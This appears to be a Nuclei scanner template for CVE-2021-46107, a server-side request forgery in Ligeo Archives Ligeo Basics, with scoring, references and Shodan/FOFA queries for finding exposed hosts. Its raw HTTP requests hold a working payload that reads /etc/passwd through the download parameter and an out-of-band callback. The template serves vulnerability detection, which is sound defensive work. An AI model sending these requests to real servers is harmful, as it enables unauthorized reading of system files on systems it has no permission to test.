id: CVE-2021-46107 info: name: Ligeo Archives Ligeo Basics - Server Side Request Forgery author: ritikchaddha severity: high description: | Ligeo Archives Ligeo Basics as of 02_01-2022 is vulnerable to Server Side Request Forgery (SSRF) which allows an attacker to read any documents via the download features. impact: | The impact of this vulnerability is significant as it can result in unauthorized access to sensitive data or systems. remediation: | Apply the latest security patches or updates provided by the vendor to fix the Server Side Request Forgery vulnerability. reference: - https://raw.githubusercontent.com/Orange-Cyberdefense/CVE-repository/master/PoCs/POC_CVE-2021-46107.py - https://nvd.nist.gov/vuln/detail/CVE-2021-46107 - https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/ - https://github.com/Transmetal/CVE-repository-master - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-46107 cwe-id: CWE-918 epss-score: 0.01673 epss-percentile: 0.87383 cpe: cpe:2.3:a:ligeo-archives:ligeo_basics:02_01-2022:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: ligeo-archives product: ligeo_basics shodan-query: title:"Ligeo" fofa-query: title="Ligeo" tags: cve2021,cve,ligeo,ssrf,lfr,ligeo-archives http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - | GET /archive/download?file=file:///etc/passwd HTTP/1.1 Host: {{Hostname}} - | GET /archive/download?file=http://{{interactsh-url}}/ HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - "regex('root:.*:0:0:', body_2) && contains(body_1, 'Ligeo Archives')" - "contains(interactsh_protocol, 'http') && contains(body_1, 'Ligeo Archives')" # digest: 4b0a00483046022100c1ca445ac180dadd1e69d6301530124c87c90f3887f499ff62a9465f50591b28022100f37355782797e70cf40f972fd4981b49a66ffd089bebabab6bfecbdaadb33ba0:922c64590222798bb761d5b6d8e72950